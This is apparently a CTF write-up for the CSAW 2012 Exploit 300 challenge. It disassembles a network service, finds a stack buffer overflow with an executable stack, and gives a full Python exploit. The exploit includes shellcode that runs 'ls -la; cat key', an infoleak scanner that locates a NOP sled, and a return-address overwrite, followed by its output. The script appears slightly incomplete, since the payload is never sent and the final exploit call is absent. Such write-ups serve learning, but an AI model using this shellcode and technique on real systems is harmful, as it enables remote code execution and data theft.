code hacking, zen coding

CSAW 2012 CTF – Exploit 300 Writeup

We have an interesting binary that uses signals to call functions. The most interesting handler is the user input handler:

(function names are my own, binary was stripped)

.text:080488C8 inputHandler    proc near               ; DATA XREF: sub_8048A3D+2Bo
.text:080488C8 s               = dword ptr -1Ch
.text:080488C8                 sub     esp, 1Ch
.text:080488CB                 mov     [esp+1Ch+s], offset aFBxpSpXpcuav ; "õ+íÕÅÀÞ»+ÕÅûÒÇé"
.text:080488D2                 call    _puts
.text:080488D7                 call    readUserInput
.text:080488DC                 add     esp, 1Ch
.text:080488DF                 retn
.text:080488DF inputHandler    endp

which call a function to read user input:

.text:0804889E readUserInput   proc near               ; CODE XREF: inputHandler+Fp
.text:0804889E fd              = dword ptr -15Ch
.text:0804889E buf             = dword ptr -158h
.text:0804889E nbytes          = dword ptr -154h
.text:0804889E var_146         = byte ptr -146h
.text:0804889E                 sub     esp, 15Ch
.text:080488A4                 mov     eax, ds:fd
.text:080488A9                 mov     [esp+15Ch+nbytes], 800h ; nbytes
.text:080488B1                 lea     edx, [esp+15Ch+var_146]
.text:080488B5                 mov     [esp+15Ch+buf], edx ; buf
.text:080488B9                 mov     [esp+15Ch+fd], eax ; fd
.text:080488BC                 call    _read
.text:080488C1                 add     esp, 15Ch
.text:080488C7                 retn
.text:080488C7 readUserInput   endp

Looks like we have a buffer overflow there Lets check it.

$ nc localhost 4842

Breakpoint in read and check the stack before the return

db$ stepi
  EAX: 0x00000201  EBX: 0x0000595F  ECX: 0xBFFFF216  EDX: 0x00000800  o d I t S z a P c
  ESI: 0x00000000  EDI: 0xB7FC3FF4  EBP: 0xBFFFF678  ESP: 0xBFFFF35C  EIP: 0x080488C7
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
=> 0x80488c7: ret    
   0x80488c8: sub    esp,0x1c
   0x80488cb: mov    DWORD PTR [esp],0x8048e23
   0x80488d2: call   0x80486b0 <puts@plt>
   0x80488d7: call   0x804889e
   0x80488dc: add    esp,0x1c
   0x80488df: ret    
   0x80488e0: push   edi
0x080488c7 in ?? ()
gdb$ x/8x $esp
0xbffff35c: 0x396b4138  0x41306c41  0x6c41316c  0x336c4132
0xbffff36c: 0x41346c41  0x6c41356c  0x376c4136  0x41386c41

Stack smashed. Calculate buffer length for EIP control:

$ /opt/framework-4.0.0/msf3/tools/pattern_offset.rb 0x396b4138

Now how can we exploit this buffer overflow to get the key ?

Checking the ELF headers:

$ eu-readelf -l exp300c.txt
Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz  MemSiz   Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x000120 0x000120 R E 0x4
  INTERP         0x000154 0x08048154 0x08048154 0x000013 0x000013 R   0x1
  [Requesting program interpreter: /lib/]
  LOAD           0x000000 0x08048000 0x08048000 0x00121c 0x00121c R E 0x1000
  LOAD           0x001f14 0x0804af14 0x0804af14 0x00015c 0x00016c RW  0x1000
  DYNAMIC        0x001f28 0x0804af28 0x0804af28 0x0000c8 0x0000c8 RW  0x4
  NOTE           0x000168 0x08048168 0x08048168 0x000044 0x000044 R   0x4
  GNU_EH_FRAME   0x000f9c 0x08048f9c 0x08048f9c 0x000094 0x000094 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x000000 0x000000 RWE 0x4
  GNU_RELRO      0x001f14 0x0804af14 0x0804af14 0x0000ec 0x0000ec R   0x1

Stack is RWE! So we will put our shellcode in the buffer (and on the stack) and jump to ip.

To get the right offset on the stack, we will fake parameters push on the stack and call send() to get dump of various memory ranges.

The way I went for it is to write a scanner with this infoleak. It will quickly scan the usual range for the stack (0xbfffffff) until it finds some readable data then i will switch to a more precise scanning and look for the nopsled we have put in front of the shellcode. As soon we have the offset of the nopsled, we switch from infoleak to exploit and jump to the shellcode which dump the content of the key file.

#!/usr/bin/env python

import socket
import sys
import struct
from struct import pack

host = sys.argv[1]
port = 4842

shellcode =  "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73"
shellcode += "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x17\x00\x00"
shellcode += "\x00\x6c\x73\x20\x2d\x6c\x61\x3e\x26\x34\x20\x3b\x20\x63"
shellcode += "\x61\x74\x20\x6b\x65\x79\x3e\x26\x34\x00\x57\x53\x89\xe1"
shellcode += "\xcd\x80"

def connect_to_host():

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.recv(132) # read banner

  return s

def exploit(offset):

  s = connect_to_host()

  payload = ('\x90' * 32) + shellcode
  payload += 'A' * (326 - len(payload))

  payload += pack("L", offset)


  data = True

  while data:
    data = s.recv(1024)
    print repr(data)

def leak(offset, size):

  s = connect_to_host()

  off_send = pack("L", 0x08048770)

  payload = ('\x90' * 32) + shellcode
  payload += 'A' * (326 - len(payload))

  payload += off_send

  payload += pack('<I', 0x08048813) # exit

  payload += pack('<I', 0x4) # fd
  payload += pack('<I', offset)
  payload += pack('<I', size) # len
  payload += pack('<I', 0x40) # flags


  result = ''
  data = True

  while data:
    data = s.recv(1024)
    result += data

  return result

print "Searching stack..."

off_shellcode_start = 0xbfffffff

data = ''

while data == '' or data == '\x00\x00\x00\x00':
  data = leak(off_shellcode_start, 4096)
  print "stack offset=", hex(off_shellcode_start), repr(data)
  if data == '' or data == '\x00\x00\x00\x00':
    off_shellcode_start -= 0xf000

print "Searching shellcode..."

data = ''

while data != '\x90\x90\x90\x90':
  data = leak(off_shellcode_start, 4)
  print "shellcode offset=", hex(off_shellcode_start), "data=", repr(data)
  if data != '\x90\x90\x90\x90':
    off_shellcode_start += 8

print "Exploiting at offset", hex(off_shellcode_start)



Exploit output:

$ python localhost
Searching stack...
stack offset= 0xbfffffffL ''
stack offset= 0xbfff0fffL ''
stack offset= 0xbffe1fffL ''
stack offset= 0xbfba9fffL ''
stack offset= 0xbfb9afffL '\x00\x00\x00\x00'
Searching shellcode...
shellcode offset= 0xbfb9afffL data= '\x00\x00\x00\x00'
shellcode offset= 0xbfb9b007L data= '\x00\x00\x00\x00'
shellcode offset= 0xbfb9cac7L data= '\xbf\x00\x08\x00'
shellcode offset= 0xbfb9cacfL data= '\x00\x04\x00\x00'
shellcode offset= 0xbfb9cad7L data= '\x90\x90\x90\x90'
Exploiting at offset 0xbfb9cad7L
'total 20\ndrwxr-xr-x  2 liaotian liaotian 4096 Sep 29 00:27 .\ndrwxr-xr-x 14 root     root     4096 Sep 29 00:27 ..\n-rw-r--r--  1 liaotian liaotian  220 Apr 10  2010 .bash_logout\n-rw-r--r--  1 liaotian liaotian 3184 Apr 10  2010 .bashrc\n-rw-r--r--  1 liaotian liaotian  675 Apr 10  2010 .profile\n'